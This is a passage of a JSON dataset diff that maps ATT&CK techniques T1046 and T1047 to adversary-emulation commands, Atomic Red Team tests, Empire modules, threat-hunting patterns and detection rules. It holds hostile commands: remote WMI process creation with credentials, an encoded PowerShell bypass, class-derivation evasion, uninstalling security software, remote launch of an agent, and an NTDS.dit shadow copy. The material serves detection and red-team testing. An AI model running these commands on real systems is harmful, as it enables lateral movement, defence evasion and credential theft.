"platforms": { + "darwin": { + "sh": { + "command": "python3 scanner.py -i #{remote.host.ip}\n", + "parsers": { + "plugins.stockpile.app.parsers.scan": [ + { + "source": 
"remote.host.ip", + "edge": "has_open_port", + "target": "remote.host.port" + } + ] + }, + "payloads": [ + "scanner.py" + ] + } + }, + "linux": { + "sh": { + "command": "python3 scanner.py -i #{remote.host.ip}\n", + "parsers": { + "plugins.stockpile.app.parsers.scan": [ + { + "source": "remote.host.ip", + "edge": "has_open_port", + "target": "remote.host.port" + } + ] + }, + "payloads": [ + "scanner.py" + ] + } + } + } + }, + { + "id": "5a4cb2be-2684-4801-9355-3a90c91e0004", + "name": "Network Service Scanning", + "description": "Scans the local network for common open ports", + "tactic": "discovery", + "technique": { + "attack_id": "T1046", + "name": "Network Service Scanning" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module ./basic_scanner.ps1;\n$ports = @(22, 53, 80, 445);\nGet-NetIPConfiguration | ?{$_.NetAdapter.Status -ne \"Disconnected\"} | Get-NetIPaddress -AddressFamily IPv4 | %{\n $ipv4 = $_.IPAddress;\n $prefixLength = $_.PrefixLength;\n Scan-Netrange -ipv4 $ipv4 -prefixLength $prefixLength -ports $ports;\n};\n", + "payloads": [ + "basic_scanner.ps1" + ], + "timeout": 180 + } + } + } + }, + { + "chain_id": "100213", + "os": "windows", + "parent_process": "rcpping.exe", + "commandline_string": "-s 127.0.0.1 -t ncacn_np", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "network_service_scanning", + "mitre_attack": "T1046", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Rpcping.md" + }, + { + "chain_id": "100214", + "os": "windows", + "parent_process": "rcpping.exe", + "commandline_string": "-s 127.0.0.1 -e 1234 -a privacy -u NTLM", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "network_service_scanning", + 
"mitre_attack": "T1046", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Rpcping.md" + }, + { + "Empire Module": "powershell/recon/find_fruit", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/recon/find_fruit\": [\"T1046\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_sql_instance_domain", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_sql_instance_domain\": [\"T1046\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_sql_server_info", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_sql_server_info\": [\"T1046\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/portscan", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/portscan\": [\"T1046\"]," + }, + { + "Empire Module": "python/situational_awareness/network/find_fruit", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/find_fruit\": [\"T1046\"]," + }, + { + "Empire Module": "python/situational_awareness/network/port_scan", + "ATT&CK Technique #1": "T1046", + "ATT&CK Technique #2": "", + "Technique": "Network Service Scanning", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/port_scan\": [\"T1046\"]," + }, + { + "Rules": "ET Open", + "SID": "*", + "Signature": "ET SCAN *", + "Verified": "Yes" + }, + { + 
"Rules": "ET Open", + "SID": "*", + "Signature": "GPL SCAN *", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET SCAN *", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "GPL SCAN *", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth", + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*transport=dt_socket,address=*" + }, + "exclusion": [ + { + "CommandLine": "*address=127.0.0.1*" + }, + { + "CommandLine": "*address=localhost*" + } + ], + "condition": "selection and not exclusion" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": 
"command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service enumeration", + "description": "A cloud service was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud service" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.group-ib.com/blog/cobalt", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ], + null + ] + }, + { + "technique_id": "T1047", + "command_list": [ + "wmic useraccount get /ALL /format:csv\n", + "wmic process get caption,executablepath,commandline /format:csv\n", + "wmic qfe get description,installedOn /format:csv\n", + "wmic /node:\"127.0.0.1\" 
service where (caption like \"%#{service_search_string}%\")\n", + "wmic /node:\"#{node}\" service where (caption like \"%Spooler%\")\n", + "wmic process call create notepad.exe\n", + "wmic /user:#{user_name} /password:#{password} /node:\"127.0.0.1\" process call create #{process_to_execute}\n", + "wmic /user:DOMAIN\\Administrator /password:#{password} /node:\"#{node}\" process call create #{process_to_execute}\n", + "wmic /user:#{user_name} /password:P@ssw0rd1 /node:\"#{node}\" process call create #{process_to_execute}\n", + "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process call create notepad.exe\n", + "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", + "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"Win32_Atomic\")\n$NewClass.Put()\nInvoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList #{process_to_execute}\n", + "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"#{new_class}\")\n$NewClass.Put()\nInvoke-WmiMethod -Path #{new_class} -Name create -ArgumentList notepad.exe\n", + "wmic /node:127.0.0.1 process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "wmic /node:#{node} process call create \"rundll32.exe $env:TEMP\\calc.dll #{function_to_execute}\"\n", + "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} StartW\"\n", + "wmic /node:\"127.0.0.1\" product where \"name like '#{product}%%'\" call uninstall", + "wmic /node:\"#{node}\" product where \"name like 'Tightvnc%%'\" call uninstall", + "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "wmic 
/node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "wmic.exe /NODE:*process call create*", + "wmic.exe /NODE:*path AntiVirusProduct get*", + "wmic.exe /NODE:*path FirewallProduct get*", + "WmiPrvSE.exe", + "wmic.exe /NODE: \"192.168.0.1\" process call create \"*.exe\"", + "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"at 9:00PM ^> \"", + "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"cmd /c vssadmin create shadow /for=C:\\Windows\\NTDS\\NTDS.dit > c:\\not_the_NTDS.dit\"", + "powershell/lateral_movement/invoke_wmi", + "powershell/persistence/elevated/wmi" + ], + "commands": [ + { + "command": "wmic useraccount get /ALL /format:csv\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic process get caption,executablepath,commandline /format:csv\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic qfe get description,installedOn /format:csv\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"127.0.0.1\" service where (caption like \"%#{service_search_string}%\")\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"#{node}\" service where (caption like \"%Spooler%\")\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic process 
call create notepad.exe\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:#{user_name} /password:#{password} /node:\"127.0.0.1\" process call create #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:DOMAIN\\Administrator /password:#{password} /node:\"#{node}\" process call create #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:#{user_name} /password:P@ssw0rd1 /node:\"#{node}\" process call create #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process call create notepad.exe\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"Win32_Atomic\")\n$NewClass.Put()\nInvoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList #{process_to_execute}\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "$Class = New-Object Management.ManagementClass(New-Object 
Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"#{new_class}\")\n$NewClass.Put()\nInvoke-WmiMethod -Path #{new_class} -Name create -ArgumentList notepad.exe\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:127.0.0.1 process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:#{node} process call create \"rundll32.exe $env:TEMP\\calc.dll #{function_to_execute}\"\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} StartW\"\n", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"127.0.0.1\" product where \"name like '#{product}%%'\" call uninstall", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic /node:\"#{node}\" product where \"name like 'Tightvnc%%'\" call uninstall", + "source": "atomics/T1047/T1047.yaml", + "name": "Atomic Red Team Test - Windows Management Instrumentation" + }, + { + "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "source": "data/abilities/collection/94f21386-9547-43c4-99df-938ab05d45ce.yml", + "name": "Capture process id, executable path, pid and parent pid before writing to disk" + }, + { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"powershell.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "source": 
"data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml", + "name": "Remotely executes 54ndc47 over WMI" + }, + { + "command": "wmic /node:`\"#{remote.host.fqdn}`\" /user:`\"#{domain.user.name}`\" /password:`\"#{domain.user.password}`\" process call create \"cmd.exe C:\\Users\\Public\\s4ndc4t.exe -server #{server} -group #{group}\";\n", + "source": "data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml", + "name": "Remotely executes 54ndc47 over WMI" + }, + { + "command": "wmic.exe /NODE:*process call create*", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /NODE:*path AntiVirusProduct get*", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /NODE:*path FirewallProduct get*", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "WmiPrvSE.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "wmic.exe /NODE: \"192.168.0.1\" process call create \"*.exe\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"at 9:00PM ^> \"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create \"cmd /c vssadmin create shadow /for=C:\\Windows\\NTDS\\NTDS.dit > c:\\not_the_NTDS.dit\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_wmi", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/elevated/wmi", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1047", + "display_name": "Windows Management Instrumentation", + "atomic_tests": [ + { + "name": "WMI Reconnaissance 
Users", + "auto_generated_guid": "c107778c-dcf5-47c5-af2e-1d058a3df3ea", + "description": "An adversary might use WMI to list all local User Accounts. \nWhen the test completes , there should be local user accounts information displayed on the command line.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic useraccount get /ALL /format:csv\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Reconnaissance Processes", + "auto_generated_guid": "5750aa16-0e59-4410-8b9a-8a47ca2788e2", + "description": "An adversary might use WMI to list Processes running on the compromised host.\nWhen the test completes , there should be running processes listed on the command line.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic process get caption,executablepath,commandline /format:csv\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Reconnaissance Software", + "auto_generated_guid": "718aebaa-d0e0-471a-8241-c5afa69c7414", + "description": "An adversary might use WMI to list installed Software hotfix and patches.\nWhen the test completes, there should be a list of installed patches and when they were installed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "wmic qfe get description,installedOn /format:csv\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Reconnaissance List Remote Services", + "auto_generated_guid": "0fd48ef7-d890-4e93-a533-f7dedd5191d3", + "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device. 
\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" \nif the provided remote host is unreacheable\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Ip Address", + "type": "String", + "default": "127.0.0.1" + }, + "service_search_string": { + "description": "Name Of Service", + "type": "String", + "default": "Spooler" + } + }, + "executor": { + "command": "wmic /node:\"#{node}\" service where (caption like \"%#{service_search_string}%\")\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Execute Local Process", + "auto_generated_guid": "b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3", + "description": "This test uses wmic.exe to execute a process on the local host.\nWhen the test completes , a new process will be started locally .A notepad application will be started when input is left on default.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_to_execute": { + "description": "Name or path of process to execute.", + "type": "String", + "default": "notepad.exe" + } + }, + "executor": { + "command": "wmic process call create #{process_to_execute}\n", + "cleanup_command": "wmic process where name='#{process_to_execute}' delete >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Execute Remote Process", + "auto_generated_guid": "9c8ef159-c666-472f-9874-90c8d60d136b", + "description": "This test uses wmic.exe to execute a process on a remote host. 
Specify a valid value for remote IP using the node parameter.\nTo clean up, provide the same node input as the one provided to run the test\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the default or provided IP is unreachable\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Ip Address", + "type": "String", + "default": "127.0.0.1" + }, + "user_name": { + "description": "Username", + "type": "String", + "default": "DOMAIN\\Administrator" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + }, + "process_to_execute": { + "description": "Name or path of process to execute.", + "type": "String", + "default": "notepad.exe" + } + }, + "executor": { + "command": "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process call create #{process_to_execute}\n", + "cleanup_command": "wmic /user:#{user_name} /password:#{password} /node:\"#{node}\" process where name='#{process_to_execute}' delete >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Create a Process using WMI Query and an Encoded Command", + "auto_generated_guid": "7db7a7f9-9531-4840-9b30-46220135441c", + "description": "Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand\n Powershell -nop -exec bypass -EncodedCommand \nWhere the \u2013EncodedCommand, once decoded, would resemble:\n Invoke-WMIMethod win32_process -name create -argumentlist \u2018rundll32 c:\\windows\\idmu\\common\\ypprop.dll _XInitImageFuncPtrs\u2019 -ComputerName WORKSTATION\nThe EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe\nYou should expect to see notepad.exe running after execution of this test.\n[Solarigate Analysis from 
Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", + "name": "command_prompt" + } + }, + { + "name": "Create a Process using obfuscated Win32_Process", + "auto_generated_guid": "10447c83-fc38-462a-a936-5102363b1c43", + "description": "This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.\n[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "new_class": { + "description": "Derived class name", + "type": "String", + "default": "Win32_Atomic" + }, + "process_to_execute": { + "description": "Name or path of process to execute.", + "type": "String", + "default": "notepad.exe" + } + }, + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = $Class.Derive(\"#{new_class}\")\n$NewClass.Put()\nInvoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}\n", + "cleanup_command": "$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"#{new_class}\"))\ntry { $CleanupClass.Delete() } catch {}\n" + } + }, + { + "name": "WMI Execute rundll32", + "auto_generated_guid": "00738d2a-4651-4d76-adf2-c43a41dfb243", + "description": "This test uses wmic.exe to execute a DLL function 
using rundll32. Specify a valid value for remote IP using the node parameter.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Ip Address", + "type": "String", + "default": "127.0.0.1" + }, + "dll_to_execute": { + "description": "Path to DLL.", + "type": "String", + "default": "$env:TEMP\\calc.dll" + }, + "function_to_execute": { + "description": "Name of DLL function to call", + "type": "String", + "default": "StartW" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL with function to execute must exist on disk at specified location (#{dll_to_execute})", + "prereq_command": "if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true\" -OutFile \"#{dll_to_execute}\"\n" + } + ], + "executor": { + "command": "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "cleanup_command": "taskkill /f /im calculator.exe", + "name": "powershell" + } + }, + { + "name": "Application uninstall using WMIC", + "auto_generated_guid": "c510d25b-1667-467d-8331-a56d3e9bc4ff", + "description": "Emulates uninstalling applications using WMIC. This method only works if the product was installed with an msi file. APTs have been seen using this to uninstall security products.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "node": { + "description": "Computer the action is being executed against but defaults to the localhost.", + "type": "string", + "default": "127.0.0.1" + }, + "product": { + "description": "Enter the product name being uninstalled. 
This will default to TightVNC.", + "type": "String", + "default": "Tightvnc" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "TightVNC must be installed.", + "prereq_command": "if ((Test-Path \"C:\\Program Files\\TightVNC\\tvnviewer.exe\")-Or (Test-Path \"C:\\Program Files (x86)\\TightVNC\\tvnviewer.exe\")) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile PathToAtomicsFolder\\T1047\\bin\\tightvncinstaller.msi\nstart-sleep -s 10\nmsiexec /i PathToAtomicsFolder\\T1047\\bin\\tightvncinstaller.msi /qn /norestart\nstart-sleep -s 15" + } + ], + "executor": { + "command": "wmic /node:\"#{node}\" product where \"name like '#{product}%%'\" call uninstall", + "cleanup_command": "msiexec /i PathToAtomicsFolder\\T1047\\bin\\tightvncinstaller.msi /qn /norestart", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "94f21386-9547-43c4-99df-938ab05d45ce", + "name": "WMIC Process Enumeration", + "description": "Capture process id, executable path, pid and parent pid before writing to disk", + "tactic": "collection", + "technique": { + "attack_id": "T1047", + "name": "WMIC" + }, + "platforms": { + "windows": { + "psh": { + "command": "wmic process get executablepath,name,processid,parentprocessid >> $env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n" + } + } + } + }, + { + "id": "ece5dde3-d370-4c20-b213-a1f424aa8d03", + "name": "Start 54ndc47 (WMI)", + "description": "Remotely executes 54ndc47 over WMI", + "tactic": "execution", + 